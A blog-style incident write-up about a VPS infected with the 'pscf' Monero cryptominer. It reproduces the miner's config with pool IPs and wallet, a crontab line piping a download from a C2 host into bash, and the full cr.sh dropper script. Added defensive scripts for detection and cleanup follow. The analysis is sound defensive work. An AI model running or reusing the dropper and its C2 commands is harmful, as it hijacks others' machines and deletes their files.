Emmmm, I actually got hit by a cryptomining virus: pscf
Discovery
My VPS has been hard to connect to lately, dropping in and out, so I wanted to redeploy it and set up a proxy while I was at it.
After I was done I was only getting a few tens of KB/s. Ping was 100-odd ms, which is fine, so something felt off. I ran top and saw a pscf process under an ordinary user eating 99%+ CPU. Damn, I'm in trouble.
Fix 1
Just kill the process, done. The speed didn't change at all. Ran top again: huh? pscf popped up again.
At this point I still didn't think it was a virus; I wondered whether the one-click proxy setup needed some file it didn't handle properly and was stuck in an infinite loop or something.
lsof -c pscf showed the running file: /var/tmp/pscf -c /var/tmp/wc.conf
Opened /var/tmp/pscf: it's a compiled executable, and I couldn't tell what it does.
ls -al /var/tmp/ and the timestamp was wrong: I only set up the proxy today, but the pscf file was dated 5 days ago.
Next, the contents of /var/tmp/wc.conf:
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": 5, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
{
"url": "158.69.133.20:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "192.99.142.249:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "202.144.193.110:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
}
I'd never seen a cryptomining virus before, but with those parameters and the several mentions of "miner" in there, I figured I'd hit the jackpot.
Then I looked at /var/tmp/config.json; its contents were the same as wc.conf.
So I searched Baidu for pscf; flipped through several pages and found nothing. Searching for "mining virus" turned up minerd and the like, and the fix was always just deleting files, but mine regenerates after I delete it. Then I thought of another approach.
Fix 2
Since it keeps regenerating, why not just strip its execute and read permissions?
So: chmod 000 /var/tmp/pscf
kill 21414
top
Hm, that worked. Checked again a bit later and f**k, the pscf process was back.
ls -al /var/tmp/ and hey, this time there's a pscf3 as well. Sigh, I really was too naive.
Fix 3
Kept searching Baidu for "linux virus" and the like, and suddenly saw someone mention scheduled tasks. Hm? That seemed plausible.
crontab -l said there were no cron jobs under this user. Next, vi /etc/crontab: no cron jobs there either. Then vi /var/spool/cron/z, and in that directory there was a file for a user whose name starts with z, a user that had never set up any cron job. Opened it and, sure enough, found one entry:
* * * * * wget -q -O - http://192.99.142.226:8220/cr.sh | bash -sh > /dev/null 2>&1
Then I ran wget http://192.99.142.226:8220/cr.sh and took a look:
#!/bin/bash
# Kill and delete competing miners and their droppers; only its own ppl/pscf are spared
pkill -f /var/tmp/java
pkill -f /tmp/java
pkill -f zz.sh
pkill -f https
pkill -f 192.99.142.232
pkill -f 46.249.38.186
rm -rf /var/tmp/java
pkill -f 185.222.210.59
pkill -f ririg
rm -rf /tmp
rm -rf /var/tmp/j*
rm -rf /var/tmp/t*
rm -rf /tmp/t*
ps ax | grep /tmp/ | grep -v grep | grep -v 'ppl\|pscf' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf' | grep -v grep | grep -v 'ppl\|pscf' | awk '{print $1}' | xargs kill -9
rm -rf /tmp/java
pkill -f pscc
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chmod 777 /var/tmp/pscf
pkill -f wo.conf
pkill -f gmr
rm -rf /var/tmp/java
rm -rf /var/tmp/ppc
# Pick a working directory: /var/tmp if pscf is writable there, otherwise a fresh mktemp dir
DIR="/var/tmp"
if [ -a "/var/tmp/pscf" ]
then
if [ -w "/var/tmp/pscf" ] && [ ! -d "/var/tmp/pscf" ]
then
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum /var/tmp/pscf | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
;;
*)
echo "pscf wrong"
pkill -f wc.conf
pkill -f pscf
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]
then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
if [ -d "/var/tmp/pscf" ]
then
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget -O";
fi
f2="192.99.142.226:8220"
# Fetch the miner only if $DIR/pscf is missing or its md5 is not the expected one;
# the cached pscf3 copy is tried before xm64 is re-downloaded from the C2
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/pscf ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/pscf | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
;;
*)
echo "pscf wrong"
sizeBefore=$(du $DIR/pscf)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
#$WGET $DIR/pscf https://transfer.sh/wbl5H/pscf
download
sumAfter=$(md5sum $DIR/pscf | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/pscf` > $DIR/var/tmp.txt
fi
;;
esac
else
echo "No md5sum"
download
fi
}
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/pscf3 | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
cp $DIR/pscf3 $DIR/pscf
;;
*)
echo "pscf wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
if [ `getconf LONG_BIT` = "64" ]
then
$WGET $DIR/pscf http://192.99.142.226:8220/xm64
fi
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/pscf | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
cp $DIR/pscf $DIR/pscf3
;;
*)
echo "pscf wrong"
;;
esac
else
echo "No md5sum"
fi
}
# Start the miner if no "/var/tmp/pscf ... wc.conf" process is running, pulling a fresh config first
if [ ! "$(ps -fe|grep '/var/tmp/pscf'|grep 'wc.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/pscf
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/pscf -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
# Re-install the every-minute cron entry if it has been removed
if crontab -l | grep -q "192.99.142.226:8220"
then
echo "Cron exists"
else
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/cr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
# Final sweep: kill competitors again, restore execute permission, and remove a rival's cron entry
pkill -f /var/tmp/java
pkill -f /var/tmp/java
pkill -f 192.99.142.232
chmod 777 /var/tmp/pscf
crontab -l | sed '/185.222.210.59/d' | crontab -
Ha! That's it, no doubt about it. Skimming it: download the file, run the mining program, add the cron job. Seen like that the routine is pretty ordinary. Read a little more closely, the script also explains why Fix 1 and Fix 2 didn't hold: the cron entry re-runs cr.sh every minute, and each run kills competing miners (it even does rm -rf /tmp), checks /var/tmp/pscf against the hard-coded md5 c8c1f2da51fbd0aea60e11a81236c9dc and falls back to the cached pscf3 or re-downloads xm64 when it doesn't match, does chmod 777 /var/tmp/pscf (which undoes the chmod 000), fetches a fresh wc.conf from 192.99.142.226:8220/wt.conf, and restarts the miner whenever no /var/tmp/pscf ... wc.conf process is running.
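The cron hunt in Fix 3 and the script it turned up come down to two indicators: a per-user crontab entry that pipes a download straight into a shell, and a process executing out of /var/tmp (the wc.conf above is in XMRig's config format; its comments point at xmrig.log and the xmrig API wiki). Below is an added example, not code from the original post or from the malware, that checks for both. The functions read text on stdin so they can be exercised on the constructed samples embedded in the script; --live runs them against the real host. One caveat a reader on another distro needs: per-user crontabs live at /var/spool/cron/<user> on RHEL/CentOS, which is where the z file was found, but at /var/spool/cron/crontabs/<user> on Debian/Ubuntu, so the live mode walks /var/spool/cron recursively rather than assuming either path.

```shell
#!/bin/sh
# Added example (not from the original post): hunt for the two footholds
# cr.sh relies on, a crontab entry that pipes a download into a shell and a
# process executing out of a world-writable scratch directory.

# Flag crontab lines that fetch something over HTTP and pipe it into sh/bash,
# e.g. "* * * * * wget -q -O - http://.../cr.sh | bash -sh".
flag_pipe_to_shell() {
    grep -E '(wget|curl)[^|]*https?://[^|]*[|][[:space:]]*(/bin/|/usr/bin/)?(ba)?sh'
}

# Flag processes whose executable lives in /tmp, /var/tmp or /dev/shm.
# Input lines look like "PID /path/to/exe args...", as from `ps -eo pid=,args=`.
# Output: one "PID /path/to/exe" per hit.
flag_scratch_execs() {
    awk '$2 ~ "^(/var)?/tmp/|^/dev/shm/" { print $1, $2 }'
}

# Every cron file on the box: per-user crontabs (/var/spool/cron/<user> on
# RHEL/CentOS, /var/spool/cron/crontabs/<user> on Debian/Ubuntu), the system
# crontab and /etc/cron.d.
cron_sources() {
    find /var/spool/cron /etc/crontab /etc/cron.d -type f 2>/dev/null
}

# Constructed samples (not captured from the infected host) for offline use:
# one benign cron job plus the dropper line cr.sh installs, and a ps listing
# with the miner running under the PID the post mentions.
SAMPLE_CRON='0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://192.99.142.226:8220/cr.sh | bash -sh > /dev/null 2>&1'
SAMPLE_PS='    1 /sbin/init
21414 /var/tmp/pscf -c /var/tmp/wc.conf
 2233 /usr/sbin/sshd -D'

# Wrappers over the samples, so the results can be checked by name.
sample_cron_hits() { printf '%s\n' "$SAMPLE_CRON" | flag_pipe_to_shell; }
sample_ps_hits()   { printf '%s\n' "$SAMPLE_PS"   | flag_scratch_execs; }

if [ "${1:-}" = "--live" ]; then
    echo "== cron entries that pipe a download into a shell =="
    for f in $(cron_sources); do
        flag_pipe_to_shell < "$f" | sed "s|^|$f: |"
    done
    echo "== processes executing from /tmp, /var/tmp or /dev/shm =="
    ps -eo pid=,args= | flag_scratch_execs
fi
```

Run it as sh hunt.sh --live as root, since other users' crontabs are not readable otherwise. A hit from the second check is not proof on its own (build tools sometimes run out of /tmp), but a long-lived process there under an account that never logs in is exactly what top showed here.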
Fix 4
- vi /var/spool/cron/z**, delete the cron job and save the file;
- kill 21969, the pscf process;
- rm /var/tmp/pscf /var/tmp/wc.conf /var/tmp/config.json
Checked top again: no pscf process, CPU usage back to normal.
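The fix that finally held does the steps in the order that matters: persistence first, the process second, files last. Two things the list above leaves out that a practitioner should cover: the cached copy /var/tmp/pscf3 that the script's download() falls back to, and waiting out at least one cron cycle (the entry is * * * * *, so more than a minute) before declaring the host clean. Below is an added example, not the author's commands, that packages that order with the indicators taken from cr.sh. The crontab filter reads stdin so it can be tested on a constructed crontab; --live USER applies it to that user's real crontab. It assumes procps pkill and a crontab that accepts -u and - (install from stdin).

```shell
#!/bin/sh
# Added example (not from the original post): remediation in the order that
# actually sticks, persistence first, process second, files last, then verify
# after a full cron cycle. Indicators are the ones visible in cr.sh above.
C2="192.99.142.226:8220"
MINER_BIN="/var/tmp/pscf"
# binary, the cached copy download() reuses, and both configs
ARTIFACTS="/var/tmp/pscf /var/tmp/pscf3 /var/tmp/wc.conf /var/tmp/config.json"

# Drop every crontab line that references the C2 host:port, keep the rest.
# Reads a crontab on stdin, writes the filtered crontab on stdout.
drop_c2_lines() {
    grep -v -F "$C2" || true
}

# Returns 0 if nothing referencing the miner binary is running, given a
# ps listing on stdin (e.g. `ps -eo args=`).
miner_absent() {
    ! grep -q -F "$MINER_BIN"
}

# Constructed crontab (not the infected host's) mixing a benign job with the
# dropper line cr.sh installs, plus two constructed ps listings.
SAMPLE_CRON='0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://192.99.142.226:8220/cr.sh | bash -sh > /dev/null 2>&1'

sample_cleaned_cron() { printf '%s\n' "$SAMPLE_CRON" | drop_c2_lines; }
sample_ps_clean() { printf 'sshd -D\n' | miner_absent; }
sample_ps_dirty() { printf '%s -c /var/tmp/wc.conf\n' "$MINER_BIN" | miner_absent; }

if [ "${1:-}" = "--live" ]; then
    user="${2:?usage: $0 --live USER}"
    # 1. persistence: rewrite the user's crontab without the C2 lines
    crontab -u "$user" -l 2>/dev/null | drop_c2_lines | crontab -u "$user" -
    # 2. process: kill anything running the miner binary
    pkill -f "$MINER_BIN" || true
    # 3. files: remove binary, cached copy and both configs (unquoted on purpose)
    rm -f $ARTIFACTS
    # 4. verify after more than one cron cycle (the entry fires every minute)
    sleep 70
    if ps -eo args= | miner_absent; then
        echo "clean: no $MINER_BIN process after a cron cycle"
    else
        echo "STILL RUNNING: some other persistence mechanism is in play" >&2
        exit 1
    fi
fi
```

If step 4 reports the miner back, the cron entry was not the only foothold, and the next places to look are the other users' crontabs, /etc/cron.d, and the SSH files mentioned in the postscript.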
Postscript
Although the CPU usage problem is solved and the executables are deleted, how this mining virus's cron job got onto the system in the first place is the next thing to track down.
Someone on Baidu said there might be an SSH backdoor left behind or something. I checked .ssh/authorized_keys and /etc/ssh/sshd_config and didn't find anything wrong; I'll keep watching tomorrow.
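Checking authorized_keys and sshd_config by eye is easy to get wrong: a planted key can hide behind a plausible comment, and the settings that matter are scattered through the file. Below is an added example, not the author's, that reads both files on stdin and prints what a reviewer should actually look at: each key's type, its option prefix (a command= or from= prefix on a key nobody remembers adding deserves attention) and its comment, plus any sshd_config directive that widens the attack surface (PermitRootLogin yes, PasswordAuthentication yes, PermitEmptyPasswords yes, or an AuthorizedKeysFile path beyond the defaults, a common way to hide a second key file). The sample key file and config are constructed, not the author's.

```shell
#!/bin/sh
# Added example (not from the original post): review the two SSH persistence
# points the author checked by hand. Both functions read a file on stdin so
# they can run on the constructed samples below; --live reads the real files.

# One line per key in authorized_keys: "TYPE|OPTIONS|COMMENT".
# Keys are located by their type token, so an options prefix that contains
# quoted spaces (command="..." ...) is kept intact in OPTIONS.
list_authorized_keys() {
    awk '
        /^[ \t]*(#|$)/ { next }
        {
            if (!match($0, /(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp[0-9]+|sk-[a-z0-9-]+@openssh\.com)[ \t]+[A-Za-z0-9+\/=]+/)) {
                print "UNPARSED||" $0; next
            }
            opts = substr($0, 1, RSTART - 1); sub(/[ \t]+$/, "", opts)
            n = split(substr($0, RSTART), f, /[ \t]+/)
            comment = ""
            for (j = 3; j <= n; j++) comment = comment (j > 3 ? " " : "") f[j]
            print f[1] "|" opts "|" comment
        }'
}

# sshd_config directives that widen the attack surface, one per line.
# (Directives inside Match blocks are reported like any other line.)
audit_sshd_config() {
    awk '
        /^[ \t]*(#|$)/ { next }
        { key = tolower($1); val = tolower($2) }
        key == "permitrootlogin"        && val == "yes" { print "PermitRootLogin yes" }
        key == "passwordauthentication" && val == "yes" { print "PasswordAuthentication yes" }
        key == "permitemptypasswords"   && val == "yes" { print "PermitEmptyPasswords yes" }
        key == "authorizedkeysfile" {
            for (j = 2; j <= NF; j++)
                if ($j != ".ssh/authorized_keys" && $j != ".ssh/authorized_keys2")
                    print "AuthorizedKeysFile " $j
        }'
}

# Constructed samples (not the author's files): one normal key, one
# forced-command key with no comment, and a config that allows root login and
# reads keys from an extra, non-default location.
SAMPLE_AUTHORIZED_KEYS='# deploy key
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyDataNotRealExampleKeyData0 alice@laptop
command="/bin/sh",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQExampleNotARealKey=='
SAMPLE_SSHD_CONFIG='Port 22
PermitRootLogin yes
PasswordAuthentication no
AuthorizedKeysFile .ssh/authorized_keys /etc/ssh/keys/%u'

sample_keys()   { printf '%s\n' "$SAMPLE_AUTHORIZED_KEYS" | list_authorized_keys; }
sample_config() { printf '%s\n' "$SAMPLE_SSHD_CONFIG" | audit_sshd_config; }

if [ "${1:-}" = "--live" ]; then
    # every user's key file, not only the account you are logged in as
    for d in /root /home/*; do
        f="$d/.ssh/authorized_keys"
        [ -r "$f" ] || continue
        echo "== $f =="
        list_authorized_keys < "$f"
    done
    echo "== /etc/ssh/sshd_config =="
    audit_sshd_config < /etc/ssh/sshd_config
fi
```

On the sample, the first key prints as ssh-ed25519||alice@laptop and the second as ssh-rsa|command="/bin/sh",no-pty| with an empty comment, which is the shape of a key worth asking about; the config check reports PermitRootLogin yes and the extra AuthorizedKeysFile path. Also check the z** user's home directory, since that is the account the cron job ran under.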
After killing the mining program the proxy speed immediately doubled. Happy.
Also looked up the IPs: Canada. Figures.